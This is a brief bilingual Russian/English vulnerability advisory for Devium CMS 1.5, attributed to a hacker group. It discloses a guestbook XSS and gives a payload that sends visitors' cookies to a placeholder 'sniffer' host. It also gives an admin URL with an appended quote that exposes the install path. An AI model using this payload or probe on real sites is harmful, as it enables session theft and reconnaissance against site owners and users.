Advisory: XSS в Devium CMS 1.5
Home Page: http://www.devium.net/
Уязвимость/Vulnerability:
XSS в гостевой книге.
Exploit:
<script>img = new Image(); img.src = "http://sniffer/a.jpg?"+document.cookie;</script>
Уязвимость/Vulnerability:
Раскрытие установочного пути в админке:
http://demo.devium.net/admin/index.php?mod=links'
Copyright © Cyber Lords Community
www.cyberlords.net